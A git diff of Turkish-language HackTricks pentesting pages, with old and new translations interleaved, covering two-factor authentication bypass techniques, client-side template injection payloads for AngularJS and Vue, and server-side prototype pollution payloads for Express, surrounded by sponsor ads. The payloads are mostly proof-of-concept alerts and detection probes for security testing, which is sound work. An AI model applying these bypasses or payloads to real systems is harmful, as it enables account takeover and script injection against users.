* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar gönderin.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını kontrol etmek için ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in ana hedefi, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -32,11 +32,11 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
### **Doğrudan Uç Nokta Erişimi**
|
||||
|
||||
2FA'yı atlamak için, yolun önemli olduğunu bilerek, ilgili uç noktaya doğrudan erişin. Başarısız olursa, **Referrer başlığını** 2FA doğrulama sayfasından gezinme taklit etmek için değiştirin.
|
||||
2FA'yı atlamak için, yolun önemli olduğunu bilerek, ilgili uç noktaya doğrudan erişin. Başarısız olursanız, **Referrer başlığını** değiştirerek 2FA doğrulama sayfasından gezinme taklit edin.
|
||||
|
||||
### **Token Yeniden Kullanımı**
|
||||
|
||||
Hesap içinde daha önce kullanılan token'ların kimlik doğrulama için tekrar kullanılması etkili olabilir.
|
||||
Daha önce kullanılan token'ların hesap kimlik doğrulamasında tekrar kullanılması etkili olabilir.
|
||||
|
||||
### **Kullanılmayan Token'ların Kullanımı**
|
||||
|
||||
|
@ -48,19 +48,19 @@ Token'ın web uygulamasından gelen bir yanıtta açığa çıkıp çıkmadığ
|
|||
|
||||
### **Doğrulama Bağlantısı Sömürüsü**
|
||||
|
||||
Hesap oluşturulurken gönderilen **e-posta doğrulama bağlantısını** kullanarak 2FA olmadan profil erişimine izin verilebilir, ayrıntılar [bu yazıda](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b) vurgulanmıştır.
|
||||
Hesap oluşturulurken gönderilen **e-posta doğrulama bağlantısını** kullanarak 2FA olmadan profil erişimine izin verilebilir, ayrıntılı bir [gönderide](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b) vurgulanmıştır.
|
||||
|
||||
### **Oturum Manipülasyonu**
|
||||
|
||||
Kullanıcının ve kurbanın hesabı için oturumları başlatmak ve kullanıcının hesabındaki 2FA'yı tamamlamadan önce bir sonraki adıma erişmeye çalışmak, arka uç oturum yönetimi sınırlamalarını sömürerek kurbanın hesap akışındaki bir sonraki adıma erişmeye çalışır.
|
||||
Kullanıcının ve kurbanın hesabı için oturumları başlatarak, kullanıcının hesabındaki 2FA'yı tamamlayıp ilerlemeden önce, kurbanın hesap akışındaki bir sonraki adıma erişmeye çalışarak, arka uç oturum yönetimi sınırlamalarını sömürme girişiminde bulunabilirsiniz.
|
||||
|
||||
### **Şifre Sıfırlama Mekanizması**
|
||||
|
||||
Şifre sıfırlama işlevini incelemek, bir bağlantıyı kullanarak birden fazla sıfırlamaya izin verip vermediğini kontrol etmek önemlidir. Yeni sıfırlanan kimlik bilgileriyle giriş yapmak, 2FA'yı atlayabilir.
|
||||
Şifre sıfırlama işlevini inceleyerek, aynı bağlantıyı kullanarak birden fazla sıfırlamaya izin verip vermediğini kontrol etmek önemlidir. Yeni sıfırlanan kimlik bilgileriyle giriş yapmak, 2FA'yı atlayabilir.
|
||||
|
||||
### **OAuth Platformunun Ele Geçirilmesi**
|
||||
### **OAuth Platformu Tehdit Altında**
|
||||
|
||||
Güvenilir bir **OAuth** platformunda (örneğin, Google, Facebook) bir kullanıcının hesabının ele geçirilmesi, 2FA'yı atlamak için bir yol sunabilir.
|
||||
Güvenilir bir **OAuth** platformunda (örneğin, Google, Facebook) bir kullanıcının hesabını tehlikeye atmak, 2FA'yı atlamak için bir yol sunabilir.
|
||||
|
||||
### **Kaba Kuvvet Saldırıları**
|
||||
|
||||
|
@ -86,7 +86,7 @@ Sınırlamalar, giriş denemelerini koruyabilir ancak dahili hesap eylemlerini k
|
|||
|
||||
#### **SMS Kodu Yeniden Gönderme Maliyetleri**
|
||||
|
||||
SMS aracılığıyla kodların aşırı yeniden gönderilmesi şirkete maliyet getirir, ancak 2FA'yı atlamaz.
|
||||
SMS aracılığıyla kodların aşırı yeniden gönderilmesi, şirkete maliyet getirir, ancak 2FA'yı atlamaz.
|
||||
|
||||
#### **Sonsuz OTP Yeniden Oluşturma**
|
||||
|
||||
|
@ -110,7 +110,7 @@ Basit kodlarla sonsuz OTP oluşturma, küçük bir kod setini tekrar deneyerek k
|
|||
|
||||
**X-Forwarded-For** başlığı aracılığıyla kurbanın IP adresini taklit etmek kısıtlamaları atlayabilir.
|
||||
|
||||
### **Eski Sürümlerin Kullanılması**
|
||||
### **Eski Sürümlerin Kullanımı**
|
||||
|
||||
#### **Alt Alanlar**
|
||||
|
||||
|
@ -118,7 +118,7 @@ Alt alanları test etmek, 2FA desteği olmayan eski sürümleri kullanabilir vey
|
|||
|
||||
#### **API Uç Noktaları**
|
||||
|
||||
/v\*/ dizin yollarıyla belirtilen eski API sürümleri, 2FA atlatma yöntemlerine karşı savunmasız olabilir.
|
||||
/v\* dizin yollarıyla belirtilen eski API sürümleri, 2FA atlatma yöntemlerine karşı savunmasız olabilir.
|
||||
|
||||
### **Önceki Oturumların İşlenmesi**
|
||||
|
||||
|
@ -126,13 +126,13 @@ Alt alanları test etmek, 2FA desteği olmayan eski sürümleri kullanabilir vey
|
|||
|
||||
### **Yedek Kodlarla Erişim Kontrolü Hataları**
|
||||
|
||||
2FA etkinleştirildiğinde hemen yedek kodların oluşturulması ve potansiyel yetkisiz erişim, özellikle CORS yanlış yapılandırmaları/XSS zafiyetleri ile, bir risk oluşturabilir.
|
||||
2FA etkinleştirildiğinde hemen yedek kodların oluşturulması ve potansiyel yetkisiz alınması, özellikle CORS yanlış yapılandırmaları/XSS zafiyetleri ile, bir risk oluşturur.
|
||||
|
||||
### **2FA Sayfasında Bilgi Sızdırma**
|
||||
|
||||
2FA doğrulama sayfasında hassas bilgi sızdırılması (örneğin, telefon numarası) endişe vericidir.
|
||||
2FA doğrulama sayfasında (örneğin, telefon numarası) hassas bilgi sızdırılması endişe vericidir.
|
||||
|
||||
### **Şifre Sıfırlamanın 2FA'yı Devre Dışı Bırakması**
|
||||
### **Şifre Sıfırlama ile 2FA'yı Devre Dışı Bırakma**
|
||||
|
||||
Potansiyel bir atlatma yöntemini gösteren bir süreç, hesap oluşturma, 2FA etkinleştirme, şifre sıfırlama ve ardından 2FA gereksinimi olmadan giriş yapmayı içerir.
|
||||
|
||||
|
@ -144,3 +144,17 @@ Kaba kuvvet denemelerini gizlemek veya sınırlama mekanizmalarını yanıltmak
|
|||
|
||||
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
|
||||
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
|
||||
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını kontrol etmek için ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
P
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
|
@ -12,13 +12,13 @@ HackTricks'ı desteklemenin diğer yolları:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -28,15 +28,15 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
# Özet
|
||||
|
||||
Bu, **sunucu tarafı şablon enjeksiyonu** gibi ancak **istemci** tarafında gerçekleşir. **SSTI**, uzak sunucuda **kod yürütmenize izin verirken**, **CSTI**, kurbanın tarayıcısında **keyfi JavaScript** kodunu yürütmenize izin verebilir.
|
||||
Bu, **sunucu tarafı şablon enjeksiyonu** gibi ancak **istemci** tarafında gerçekleşir. **SSTI**, uzak sunucuda **kod yürütmenize** olanak tanırken, **CSTI**, kurbanın tarayıcısında **keyfi JavaScript** kodu yürütmenize olanak tanıyabilir.
|
||||
|
||||
Bu zafiyetin **test edilmesi**, **SSTI** durumunda olduğu gibi çok **benzerdir**, yorumlayıcı bir **şablon** bekler ve onu yürütür. Örneğin, `{{ 7-7 }}` gibi bir yük ile, uygulama **savunmasız** ise bir `0` göreceksiniz ve değilse, orijinali göreceksiniz: `{{ 7-7 }}`
|
||||
Bu zafiyetin **test edilmesi**, **SSTI** durumunda olduğu gibi çok **benzerdir**, yorumlayıcı **bir şablon** bekler ve onu yürütür. Örneğin, `{{ 7-7 }}` gibi bir yük ile, uygulama **savunmasız** ise bir `0` göreceksiniz ve değilse, orijinali göreceksiniz: `{{ 7-7 }}`
|
||||
|
||||
# AngularJS
|
||||
|
||||
AngularJS, HTML ile etkileşime geçen yaygın olarak kullanılan bir JavaScript çerçevesidir ve **`ng-app`** olarak bilinen direktifler aracılığıyla HTML ile etkileşime geçer. Bu direktif, AngularJS'in HTML içeriğini işlemesine izin verir ve çift süslü parantezler içinde JavaScript ifadelerinin yürütülmesini sağlar.
|
||||
AngularJS, HTML ile etkileşime geçen yaygın olarak kullanılan bir JavaScript çerçevesidir ve **`ng-app`** olarak bilinen direktifler aracılığıyla HTML ile etkileşime geçer. Bu direktif, AngularJS'in HTML içeriğini işlemesine izin verir ve çift süslü parantez içinde JavaScript ifadelerinin yürütülmesini sağlar.
|
||||
|
||||
Kullanıcı girişinin dinamik olarak `ng-app` ile etiketlenmiş HTML gövdesine eklenmesi durumunda, keyfi JavaScript kodunu yürütmek mümkündür. Bu, giriş içinde AngularJS sözdizimini kullanarak başarılabilir. Aşağıda, JavaScript kodunun nasıl yürütülebileceğini gösteren örnekler bulunmaktadır:
|
||||
Kullanıcı girişinin dinamik olarak `ng-app` ile etiketlenmiş HTML gövdesine eklenmesi durumunda, keyfi JavaScript kodu yürütmek mümkündür. Bu, giriş içinde AngularJS sözdizimini kullanarak başarılabilmektedir. Aşağıda, JavaScript kodunun nasıl yürütülebileceğini gösteren örnekler bulunmaktadır:
|
||||
```javascript
|
||||
{{$on.constructor('alert(1)')()}}
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
|
@ -45,7 +45,7 @@ Kullanıcı girişinin dinamik olarak `ng-app` ile etiketlenmiş HTML gövdesine
|
|||
<!-- Google Research - AngularJS -->
|
||||
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
|
||||
```
|
||||
**AngularJS**'deki zafiyetin çok **temel bir çevrimiçi örneğini** [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) ve **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**'da bulabilirsiniz.
|
||||
Çok **temel bir çevrimiçi örneği** **AngularJS**'deki zafiyetin [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) ve **[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)** adreslerinde bulabilirsiniz.
|
||||
|
||||
{% hint style="danger" %}
|
||||
[**Angular 1.6 kum havuzunu kaldırdı**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) bu nedenle bu sürümden itibaren `{{constructor.constructor('alert(1)')()}}` veya `<input ng-focus=$event.view.alert('XSS')>` gibi bir yük çalışmalıdır.
|
||||
|
@ -53,7 +53,7 @@ Kullanıcı girişinin dinamik olarak `ng-app` ile etiketlenmiş HTML gövdesine
|
|||
|
||||
# VueJS
|
||||
|
||||
**Zafiyetli Vue** uygulamasını [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh) adresinde bulabilirsiniz.\
|
||||
**Zafiyetli bir Vue** uygulamasını [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh) adresinde bulabilirsiniz.\
|
||||
Çalışan yük: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
|
||||
|
||||
Ve zafiyetli örneğin **kaynak kodu** burada: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
|
||||
|
@ -61,9 +61,9 @@ Ve zafiyetli örneğin **kaynak kodu** burada: [https://github.com/azu/vue-clien
|
|||
<!-- Google Research - Vue.js-->
|
||||
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
|
||||
```
|
||||
Bir VUE'da CSTI hakkında gerçekten iyi bir yazı [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets) adresinde bulunabilir.
|
||||
|
||||
## **V3**
|
||||
|
||||
VUE'da CSTI hakkında gerçekten iyi bir yazıya [buradan](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets) ulaşılabilir.
|
||||
```
|
||||
{{_openBlock.constructor('alert(1)')()}}
|
||||
```
|
||||
|
@ -99,15 +99,15 @@ javascript:alert(1)%252f%252f..%252fcss-images
|
|||
|
||||
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -115,12 +115,12 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın veya** bizi **Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,23 +2,23 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
- **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
- **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
|
||||
- [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
- [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
- **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
- [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
- **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
- **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için ücretsiz işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -32,9 +32,9 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
**Daha fazla ayrıntı için [orijinal araştırmaya göz atın](https://portswigger.net/research/server-side-prototype-pollution)**
|
||||
|
||||
### JSON içerik türünü HTML'ye değiştirin
|
||||
### JSON içerik türünü HTML olarak değiştirin
|
||||
|
||||
Bir Express uygulamasında **JSON içerik türü yanıtı** kullanan ve bir JSON yansıtan:
|
||||
Bir Express uygulamasında **JSON içerik türü yanıtı** kullanarak ve bir JSON yansıtarak:
|
||||
```javascript
|
||||
app.use(bodyParser.json({type: 'application/json'}));
|
||||
app.post('/', function(req, res){
|
||||
|
@ -46,11 +46,9 @@ Bu durumlarda XSS genellikle JSON içerik türüyle mümkün olmaz. Bununla birl
|
|||
```json
|
||||
{"__proto__":{"_body":true,"body":"<script>evil()"}}
|
||||
```
|
||||
**`body`** ve **`_body`** özelliklerini **kirleterek**, **Express'in HTML içerik türünü sunmasına** ve **_body** özelliğini yansıtarak depolanan XSS'e neden olmak mümkündür.
|
||||
|
||||
### UTF7 Rendeleme
|
||||
|
||||
Express'in **UTF-7 içeriği render etmesi mümkündür**:
|
||||
Express, UTF-7 içeriğini **şu şekilde** render etmesini sağlamak mümkündür:
|
||||
```json
|
||||
{"__proto__":{"content-type": "application/json; charset=utf-7"}}
|
||||
```
|
||||
|
@ -72,11 +70,11 @@ Aşağıdaki PP cihazı sunucunun **`Access-Control-Expose_headers: foo`** HTTP
|
|||
```json
|
||||
{"__proto__":{"exposedHeaders":["foo"]}}
|
||||
```
|
||||
Gerekli olan **CORS modülünün yüklü olmasıdır**
|
||||
**CORS modülünün yüklü olması gerekmektedir**
|
||||
|
||||
### **OPTIONS Metodu**
|
||||
|
||||
Aşağıdaki yük ile bir OPTIONS yanıtından bir metodun **gizlenmesi mümkündür**:
|
||||
Aşağıdaki yük ile bir OPTIONS yanıtından bir metod gizlemek mümkündür:
|
||||
```javascript
|
||||
// Original reponse: POST,GET,HEAD
|
||||
|
||||
|
@ -93,14 +91,14 @@ Aşağıdaki PP yükü kullanılarak **döndürülen durum kodu** değiştirileb
|
|||
```
|
||||
### Hata
|
||||
|
||||
Bir dize gibi bir ilkel değerle bir prototip atadığınızda, prototipin bir nesne olması gerektiği için bir **boş işlem üretir**. Bir prototip nesnesini `Object.prototype`'e atamaya çalışırsanız, bu bir **istisna fırlatacaktır**. Bu iki davranışı kullanarak **prototip kirliliğinin başarılı olup olmadığını tespit edebiliriz**:
|
||||
Prototipe bir dize gibi bir ilkel değer atadığınızda, prototipin bir nesne olması gerektiği için bir **boş işlem üretir**. Eğer bir prototip nesnesini `Object.prototype`'e atamaya çalışırsanız, bu bir **istisna fırlatacaktır**. Bu iki davranışı kullanarak **prototip kirliliğinin başarılı olup olmadığını tespit edebiliriz**:
|
||||
```javascript
|
||||
({}).__proto__.__proto__={}//throws type exception
|
||||
({}).__proto__.__proto__="x"//no-op does not throw exception
|
||||
```
|
||||
### Yansıtılan Değer
|
||||
|
||||
Bir uygulama yanıtında bir nesne içeriyorsa ve `__proto__` ile birlikte **olağandışı bir isme sahip bir özellik oluşturulursa**, bu durum dikkat çekici olabilir. Özellikle, yanıtta **yalnızca olağandışı özelliğin** döndürülmesi, uygulamanın zafiyetini işaret edebilir:
|
||||
Bir uygulama yanıtında bir nesne içerdiğinde, `__proto__` ile birlikte **olağandışı bir isme sahip bir özellik oluşturmak**, bilgilendirici olabilir. Özellikle, yanıtta **yalnızca olağandışı özelliğin** döndürülmesi, uygulamanın zafiyetini işaret edebilir:
|
||||
```json
|
||||
{"unusualName":"value","__proto__":"test"}
|
||||
```
|
||||
|
@ -114,7 +112,7 @@ Ayrıca, Lodash gibi bir kütüphane kullanıldığında, bir özelliği hem pro
|
|||
### Noktalara İzin Ver
|
||||
|
||||
Express'te **sorgu dizesi parametrelerinden nesneler oluşturmanıza izin veren** bir seçenek bulunmaktadır.\
|
||||
Bu seçeneği kullanarak bir hata **zinciri** oluşturup bir **prototype pollution zafiyetini** sömürmekte kesinlikle kullanabilirsiniz.
|
||||
Bu seçeneği kesinlikle bir hata **zincirinde** kullanarak bir **prototype pollution zafiyetini** sömürmekte kullanabilirsiniz.
|
||||
```json
|
||||
{"__proto__":{"allowDots":true}}
|
||||
```
|
||||
|
@ -125,15 +123,15 @@ Bu seçeneği kullanarak bir hata **zinciri** oluşturup bir **prototype polluti
|
|||
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -143,10 +141,10 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
